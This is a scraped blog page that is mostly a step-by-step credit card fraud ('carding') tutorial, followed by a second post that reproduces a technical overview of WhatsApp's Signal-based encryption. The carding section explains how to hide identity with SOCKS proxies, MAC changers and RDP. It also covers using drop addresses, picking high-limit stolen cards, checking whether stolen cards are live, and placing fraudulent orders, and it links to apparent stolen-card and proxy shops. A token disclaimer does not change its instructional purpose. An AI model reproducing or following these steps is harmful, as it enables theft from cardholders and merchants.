<div style="text-align: center;">
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 251px;"></col>
<col style="width: 251px;"></col>
<col style="width: 251px;"></col></colgroup>
<tbody valign="top">
<tr>
<td colspan="2" style="padding-left: 9px; padding-right: 9px;" valign="middle">
<div style="text-align: center;">
<span style="font-size: 10pt;"><strong>Offer on Facebook group</strong></span></div>
</td>
<td style="padding-left: 9px; padding-right: 9px;" valign="middle">
<div style="text-align: center;">
<span style="font-size: 10pt;"><strong>Offer on WhatsApp group</strong></span></div>
</td>
</tr>
<tr>
<td colspan="2" style="padding-left: 9px; padding-right: 9px;"><img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar2.jpg" /></td>
<td style="padding-left: 9px; padding-right: 9px;"><img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar3.jpg" /></td>
<td style="padding-left: 9px; padding-right: 9px;"><img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar4.jpg" /></td>
</tr>
</tbody>
</table>
</div>
Let’s start with the basics.<br />
<ol>
<li><strong>Introduction to Carding and Key Points:<br />
</strong></li>
</ol>
There are multiple definitions available per different views.<br />
<strong>Carding</strong> itself is defined as the illegal use of the card (Credit/Debit) by unauthorized people (carder) to buy a product.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar5.jpg" /></div>
<h2>
1.1 Key points in carding method.</h2>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar6.jpg" /></div>
<h1>
2. Let start to understand each point one by one.</h1>
<h2>
2.1 Computer (PC):</h2>
For doing carding always use a computer. I know some methods using a
mobile device, but it is less secure and involves more risk.<br />
<h2>
2.2 SOCKS:</h2>
SOCKS stands for <strong>SOCK</strong>et <strong>S</strong>ecure. It
is internet protocol which allows client and server traffic pass through
a proxy server, so real IP is getting hidden and proxy IP get
reflected.<br />
This is useful while carding because carder wants to use the credit card holder’s location while doing it.<br />
Users can buy SOCKS.<br />
<h2>
2.3 Mac Address Changer:</h2>
MAC stands for Media Access Control. It is the unique address of every Network Interface Card (NIC).<br />
A MAC address changer allows you to change the MAC address of NIC instantly. It is required to be anonymous and safe <span style="font-family: Wingdings;">J</span><br />
<h2>
2.4 CCleaner:</h2>
It is very useful tool help in cleaning your browsing history, cookies, temp files, etc.<br />
Many people ignore this part and get caught, so be careful and don’t forget to use it <span style="font-family: Wingdings;">J</span><br />
<h2>
2.5 RDP (Remote Desktop Protocol):</h2>
RDP allows one computer to connect to another computer within the network. It is protocol developed by Microsoft.<br />
Basically, carders use it to connect to computers of the geolocation
of the person whose credit card carder want to use. It is used for
safety and stay anon. Here carders using others’ PC for doing carding
instead of their own.<br />
<h2>
2.6 DROP:</h2>
DROP is an address which the carder uses for the shipping address in the carding process.<br />
Let me explain in details with an example:<br />
If I am carding with US credit card, then I use USA address as
shipping address then my order will be shipped successfully, and I will
be safe. If you have relatives/friends, then no problem, otherwise use
sites who provide drop services only we have to pay extra for shipping
it.<br />
<h2>
2.7 credit card (Credit Card):</h2>
This part is very much important so read it carefully. Any credit card it is in the following format:<br />
| credit card Number |Exp Date| CVV2 code | Name on the Card |
Address | City | State | Country | Zip code | Phone # (sometimes not
included depending on where you get your credit card from)|<br />
e.g.: (randomly taken number/details)<br />
<span style="color: #ffc000;">| 4305873969346315 | 05 | 2018 | 591 | UNITED STATES | John Mechanic | 201<br />
</span><br />
<span style="color: #ffc000;">Stone Wayne Lane | Easternton | MA | 01949 |<br />
</span><br />
<strong>Types of Credit Card:<br />
</strong><br />
Every Credit card company starts their credit card number with a unique number to identify individually like shown below<br />
<strong>American Express (AMEX Card) – 3<br />
</strong><br />
<strong>Visa Card – 4<br />
</strong><br />
<strong>Master Card – 5<br />
</strong><br />
<strong>Discover (Disco) – 6<br />
</strong><br />
<strong>Company wise credit card details:<br />
</strong><br />
<h3>
Visa</h3>
<ol style="margin-left: 45pt;">
<li>Classic: The Card is used worldwide in any locations designated by
Visa, including ATMs, real and virtual Stores, and shops offering goods
and services by mail and telephone.</li>
<li>Gold – This card has a higher limit capacity. Most used card and adopted worldwide.</li>
<li>Platinum – Card is having limits over $10,000.</li>
<li>Signature – No preset spending limit – great bin to get</li>
<li>Infinite – Most prestigious card with having virtually no limit.
There is less in circulation so be alert when buying these. Use only
with reputable sellers!</li>
<li>Business – it can be used for small to medium sized businesses, usually has a limit.</li>
<li>Corporate – it can be used with medium to large size businesses, having more limit than a Business card.</li>
<li>Black – It has limited membership. It has no limit only having $500 annual fee, high-end card.</li>
</ol>
<h3>
MasterCard</h3>
<ol style="margin-left: 45pt;">
<li>Standard – it is same as classic visa card.</li>
<li>Gold – it is same as visa gold card.</li>
<li>Platinum – it is same as visa platinum card</li>
<li>World – it has a very high limit.</li>
<li>World Elite – it is virtually no limit, high-end card.</li>
</ol>
<h3>
Amex Card</h3>
<ol>
<li>Gold – it usually has around a 10k limit.</li>
<li>Platinum- is usually has a higher limit (around 35k).</li>
<li>Centurion – it has a High limit (75k+). It is also known as the black card, note: do not confuse with visa black card.</li>
</ol>
<h1>
Now we can start with some of the questionnaire and Basic concepts before start practical process of Carding.</h1>
<strong>Q1. What is BIN?<br />
</strong><br />
It is known as Bank Identification Number (BIN). It is a 6-digit number e.g.: 431408.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar7.jpg" /></div>
Some of the reference sites which give BIN info which I also refer:<br />
<a href="http://www.bins.pro/">www.bins.pro</a><br />
<a href="http://www.binlists.com/">www.binlists.com</a><br />
<a href="http://www.exactbins.com/">www.exactbins.com</a><br />
Simply go to the site (<a href="http://www.bins.pro/">www.bins.pro</a>)<span style="font-family: Wingdings;">à</span>enter BIN number and click on find to get the details. I have added first 4 digits only.<br />
You can filter out the option as per requirement shown below<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar8.png" /></div>
We got most of the information from the site. Now the question is how
to know the balance of CC. is it possible? and answer is Yes, I will
let you know step by step using normal as well as Skype method <span style="font-family: Wingdings;">J</span><br />
<strong>Q2. What is the meaning of VBV, NON VBV and MSC?<br />
</strong><br />
VBV (Verified by Visa) – Extra level protection is added by Visa to protect the Card from fraud.<br />
Like DOB, password, Social Security Number and Mother’s name, etc.
also sending OTP (one-time password) as extra security level to card
owner mobile number to validate the transaction.<br />
NON VBV (Verified by Visa) –Handy to use. No need extra information as specified in VBV card while doing the transaction.<br />
Note it down (IMP)- Carders mainly buy and use NON VBV cards for carding.<br />
MSC (MasterCard Secure Code) – security level same as VBV card.<br />
<strong>Q3. What is AVS?<br />
</strong><br />
It stands for Address Verification System<br />
It is the system which is used to identify the credit card holder
original address with billing address provided by the user while
shopping or online transaction.<br />
The system is used to identify the online fraud over the internet.<br />
<strong>Q4. How to check credit card is live or dead?<br />
</strong><br />
There are many sites available on the internet to verify credit card
is live or dead, but they charge for it approx. $0.001 (price may vary).
Also, 80% websites kill the credit card so never use it.<br />
There are tools also available on the internet to check the credit
card status, but most of them are a backdoor or Trojan so prefer not to
use it.<br />
As such there is no easy method to check it. Carder uses own ways to find it out. One of the ways is…<br />
Most carder go to Porn sites, buy a membership and confirm the credit card is live and proceed with carding.<br />
<strong>Q5. How to check the credit card is live or dead? (Skype Method)<br />
</strong><br />
(Note: method is posted on March 16)<br />
Login into Skype account and call on Magic number +18005xx5633
(masked). You will connect to voice mail (lady’s voice). Start by
entering the credit card number, and voice mail lady will stop
automatically.<br />
After that enter Expiry date of a card like 01 16 (mm: yy format).<br />
If your credit card is live then voice mail lady will speak like
“Thank you for calling, we really appreciate your business, since u are a
1st-time caller we would like to connect you .. blah blah” then just
hang the call.<br />
But if the credit card is used and voice mail lady speak like “Ohh
I’m sorry please re-enter your credit card number now” then the card is
dead. You can repeat the same process as many time you want.<br />
Note: You need a good internet connection for Skype calls.<br />
<strong>Q6. What is Bill=ship/Bill=CC/Ship=your Address?<br />
</strong><br />
Kindly pay attention here as it is also the main portion in carding
process. Any mistake will cancel the order and id get blocked.<br />
BILL=SHIP (Billing address: Shipping address)<br />
Take a scenario of normal online shopping scenario, when you are
doing carding you will use billing address and shipping address are
same. Means in both u will use your address. No need to use credit card
address.<br />
Bill=Shipping address, Ship=your address<br />
When you are doing carding, you will use credit card holder address
as your billing address, and shipping address will be your address. Most
sites use this method.<br />
<h1>
Now we cleared basic concepts and start with the actual process of carding.</h1>
<h2>
Setup SOCKS proxy in Firefox:</h2>
Follow the steps <span style="font-family: Wingdings;">à</span> open Firefox <span style="font-family: Wingdings;">à</span> go to options <span style="font-family: Wingdings;">à</span>advanced options <span style="font-family: Wingdings;">à</span> network <span style="font-family: Wingdings;">à</span><br />
A pop-up will come. It will show options<br />
No proxy 2. Auto Detect 3. Use system proxy 4. Manual proxy configuration<br />
Select manual proxy configuration. Enter socks host: <<proxy
ip>> and port: <<proxy port>> e.g.:
141.141.141.141: 8080. Press ok and restart Firefox. Now you are
connected to secure Socks5 <span style="font-family: Wingdings;">J</span><br />
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
Note: when you buy a socks always match with credit card holder
address. If credit card holder is from California, USA then try to get
SOCKS5 at least matching state, country <span style="font-family: Wingdings;">J</span><br />
Guys now time to start the Carding process. Kindly follow the steps:<br />
<ol>
<li>Create the email id matching with credit card holder name. If his
name is John Cena ( the random name was taken), then email id should be <a href="mailto:johncena92@gmail.com">johncena92@gmail.com</a> or near about.</li>
<li>Now Run RDP and connect to the credit card holder location system to
proceed. If you didn’t have RDP, then follow following steps.</li>
<li>Open MAC changer and change the address randomly.</li>
<li>Run CCleaner and clean all the unwanted data (cookies/history/temp data etc.).</li>
<li>Setup SOCKS5 proxy in Firefox. <<Already explained>>.</li>
<li>Be sure to use SOCK5 is matching to the location of credit card
holder and be aware not to use blacklisted IP. Check with
www.check2ip.com</li>
<li>Open the site for shopping. I want to recommend a website shop from
your country because you don`t need to wait a lot for your package.</li>
<li>Register with credit card holder information (John Cena), name, country, city, address, and email.</li>
<li>Shop and choose your item and add to cart. Precaution: Select item not more than $500 at first step.</li>
<li>In shipping address add your address or drop address where the product is going to deliver.</li>
<li>Then go to the payment page and choose payment method like a credit card.</li>
<li>Enter all details of credit card manually because most of site having copy paste detector script.</li>
<li>Finally, in billing address add credit card owner address info and then proceed with the payment process.</li>
<li>If everything all right then the order will get successfully placed.</li>
<li>Once the order arrives at the shipping address, receive it from delivery boy.</li>
<li>(Few carder arrange fake id if delivery boy ask for proof).</li>
</ol>
<strong>Carding method using mobile:<br />
</strong><br />
Extra pro carder uses mobile for doing carding. If you followed steps carefully, you would also do that.<br />
<strong>Basic requirement:<br />
</strong><br />
<ol>
<li>Require rooted Android mobile.</li>
<li>Install few application require for carding (proxy apps, CCleaner, IMEI changer, Photo and Android ID changer).</li>
<li>You can use any VPN for carding I recommend HMA or Zen mate.</li>
<li>You can use SOCKS5 proxy with proxy droid apps.</li>
<li>Also, proceed with IMEI and Android ID changer and do it.</li>
<li>Now connect with proxy droid with SOCKS5 proxy and connect it.</li>
<li>Now follow all the steps explained above <span style="font-family: Wingdings;">J</span></li>
</ol>
<strong>Reference sites:<br />
</strong><br />
CC from shop <span style="font-family: Wingdings;">à</span> www.validcc.su<br />
Buy SOCKS from <span style="font-family: Wingdings;">à</span> www.vip72.com<br />
Download CCleaner software <span style="font-family: Wingdings;">à</span> www.piriform.com/ccleaner<br />
Download MAC address changer <span style="font-family: Wingdings;">à</span> www.zokali.com/win7-mac-addresschanger<br />
Download SOCKS checker <span style="font-family: Wingdings;">à</span> www.socksproxychecker.com<br />
<ul style="margin-left: 54pt;">
<li>
<div>
Acronyms:</div>
<ul>
<li>BIN: Bank Identification Number</li>
<li>CC: Credit Card</li>
<li>CCN: Credit Card Number</li>
<li>CVV/CVV2: Credit Verification Value (Card Security Code)</li>
<li>SSN: Social Security Number</li>
<li>MMN: Mother Maiden Name</li>
<li>DOB: Date Of Birth</li>
<li>COB: Change of Billing</li>
<li>VBV: Verified by Visa</li>
<li>MCSC: MasterCard Secure Code</li>
<li>POS: Point of Sale</li>
<li>VPN: Virtual Private Network</li>
<li>BTC: Bitcoin</li>
</ul>
</li>
<li>Personal Advice:</li>
</ul>
<ol style="margin-left: 72pt;">
<li>Normal users: Keep your credit card safe hands. Keep changing the
credit card PIN on a monthly basis. Do not make the online transaction
from unknown system/mobile.</li>
<li>Who want to learn carding – I observed many of the newcomers try to
be smart and got ripped multiple times. Don’t do it, it’s finally your
loss.</li>
<li>Carding is Illegal activity. Do not do it. If get caught, then, you will be in trouble.</li>
<li>Be safe and have fun <span style="font-family: Wingdings;">J</span></li>
</ol>
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/120816_2349_AllAboutCar9.png" /></div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-51981082651873497852016-09-16T12:46:00.001+05:302016-09-16T12:46:48.719+05:30WhatsApp Encryption Part-1 : Weakness and Attack Victors <div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"> </span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDA2JgsElctHCCdJN8CR1aqizEKcexurQLpRrSy4DQ6acwqnrmhunN4FNZ7mXFSi2226uJyLv1fgBFVt3Sk7fqusSS4ev07pOYJ07CXJHQQHMY17mLQ26_mB7_NRfjJmNZo9mkpduwHE/s1600/WhatsApp-Spy-735x400.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDA2JgsElctHCCdJN8CR1aqizEKcexurQLpRrSy4DQ6acwqnrmhunN4FNZ7mXFSi2226uJyLv1fgBFVt3Sk7fqusSS4ev07pOYJ07CXJHQQHMY17mLQ26_mB7_NRfjJmNZo9mkpduwHE/s400/WhatsApp-Spy-735x400.jpg" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span><br />
<br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">This provides a technical explanation of WhatsApp’s<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">end-to-end encryption system .<span style="color: #59595c; font-style: normal; font-variant: normal;"><br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp Messenger allows people to exchange messages (including<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">chats, group chats, images, videos, voice messages and files) and make<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp calls around the world . WhatsApp messages and calls between<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">a sender and receiver that use WhatsApp client software released after<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">March 31, 2016 are end-to-end encrypted .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The Signal protocol, designed by Open Whisper Systems, is the basis for<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp’s end-to-end encryption . This end-to-end encryption protocol<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">is designed to prevent third parties and WhatsApp from having plaintext<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">access to messages or calls. What’s more, even if encryption keys<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from a user’s device are ever physically compromised, they cannot be<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">used to go back in time to decrypt previously transmitted messages.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">This document gives an overview of the Signal protocol and its use in<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"> <span style="color: #39bca8; font-style: normal; font-variant: normal;">Public Key Types<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key Pair <span style="color: #59595c; font-style: normal; font-variant: normal;">– A long-term Curve25519 key pair,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">generated at install time .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– A medium-term Curve25519 key pair,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">generated at install time, signed by the <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, and rotated<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">on a periodic timed basis .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">– A queue of Curve25519 key pairs for one<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">time use, generated at install time, and replenished as needed .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Session Key Types<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– A 32-byte value that is used to create <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– A 32-byte value that is used to create <span style="color: #59595c; font-style: normal; font-variant: normal;">Message<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Keys<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">• <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">– An 80-byte value that is used to encrypt message<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">contents. 32 bytes are used for an AES-256 key, 32 bytes for a<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 key, and 16 bytes for an IV.</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;">Client Registration<br /><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">At registration time, a WhatsApp client transmits its public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, public <span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">(with its signature), and a batch of public<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">to the server . The WhatsApp server stores these<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public keys associated with the user’s identifier. At no time does the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">WhatsApp server have access to any of the client’s private keys.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Initiating Session Setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">To communicate with another WhatsApp user, a WhatsApp client<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">first needs to establish an encrypted session. Once the session<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">is established, clients do not need to rebuild a new session with<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">each other until the existing session state is lost through an<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">external event such as an app reinstall or device change .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">To establish a session:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The initiating client (“initiator”) requests the public <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key<span style="color: #59595c; font-style: normal; font-variant: normal;">,<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">public <span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, and a single public <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">for the recipient .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The server returns the requested public key values. A <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is only used once, so it is removed from server storage<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">after being requested . If the recipient’s latest batch of <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Pre Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">has been consumed and the recipient has not replenished<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">them, no <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">will be returned .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The initiator saves the recipient’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as <span style="color: #59595c; font-style: normal; font-variant: normal;">I<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">, the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Signed Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as <span style="color: #59595c; font-style: normal; font-variant: normal;">S<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">, and the <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">O<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">4 . The initiator generates an ephemeral Curve25519 key pair, <span style="color: #59595c; font-style: normal; font-variant: normal;">E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">5 . The initiator loads its own <span style="color: #59595c; font-style: normal; font-variant: normal;">Identity Key <span style="color: #59595c; font-style: normal; font-variant: normal;">as <span style="color: #59595c; font-style: normal; font-variant: normal;">I<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">6 . The initiator calculates a master secret as <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret =<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(I<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, S<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">) || ECDH(E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, I<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">) ||<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">ECDH(E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, S<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">) || ECDH(E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;">, O<span style="color: #939597; font-style: normal; font-variant: normal;">recipient<span style="color: #59595c; font-style: normal; font-variant: normal;">)<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">If there is no <span style="color: #59595c; font-style: normal; font-variant: normal;">One Time Pre Key<span style="color: #59595c; font-style: normal; font-variant: normal;">, the final ECDH is omitted.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">7 . The initiator uses HKDF to create a <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key<span style="color: #59595c; font-style: normal; font-variant: normal;">s<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Receiving Session Setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">After building a long-running encryption session, the initiator can immediately start sending messages to the recipient, even if the recipient is offline.<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Until the recipient responds, the initiator includes the information (in the<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">header of all messages sent) that the recipient requires to build a corresponding session . This includes the initiator’s <span style="color: #59595c; font-style: normal; font-variant: normal;">E<span style="color: #939597; font-style: normal; font-variant: normal;">initiator <span style="color: #59595c; font-style: normal; font-variant: normal;">and <span style="color: #59595c; font-style: normal; font-variant: normal;">I<span style="color: #939597; font-style: normal; font-variant: normal;">initiator<span style="color: #59595c; font-style: normal; font-variant: normal;"> .</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<!--EndFragment--><span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">When the recipient receives a message that includes session setup<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">information:<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">1 . The recipient calculates the corresponding <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret <span style="color: #59595c; font-style: normal; font-variant: normal;">using<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">its own private keys and the public keys advertised in the header of<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">the incoming message .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">2 . The recipient deletes the <span style="color: #59595c; font-style: normal; font-variant: normal;">One-Time Pre Key <span style="color: #59595c; font-style: normal; font-variant: normal;">used by the initiator .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">3 . The initiator uses HKDF to derive a corresponding <span style="color: #59595c; font-style: normal; font-variant: normal;">Root Key <span style="color: #59595c; font-style: normal; font-variant: normal;">and<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Keys <span style="color: #59595c; font-style: normal; font-variant: normal;">from the <span style="color: #59595c; font-style: normal; font-variant: normal;">master_secret<span style="color: #59595c; font-style: normal; font-variant: normal;"> .<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Exchanging Messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Once a session has been established, clients exchange messages<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">that are protected with a <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">using <span style="color: #59595c; font-style: normal; font-variant: normal;">AES256 <span style="color: #59595c; font-style: normal; font-variant: normal;">in CBC<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">mode for encryption and <span style="color: #59595c; font-style: normal; font-variant: normal;">HMAC-SHA256 <span style="color: #59595c; font-style: normal; font-variant: normal;">for authentication .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">changes for each message transmitted, and is ephemeral, such that the <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">used to<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">encrypt a message cannot be reconstructed from the session<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">state after a message has been transmitted or received .<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">The <span style="color: #59595c; font-style: normal; font-variant: normal;">Message Key <span style="color: #59595c; font-style: normal; font-variant: normal;">is derived from a sender’s <span style="color: #59595c; font-style: normal; font-variant: normal;">Chain Key <span style="color: #59595c; font-style: normal; font-variant: normal;">that<br /><span style="color: #59595c; font-style: normal; 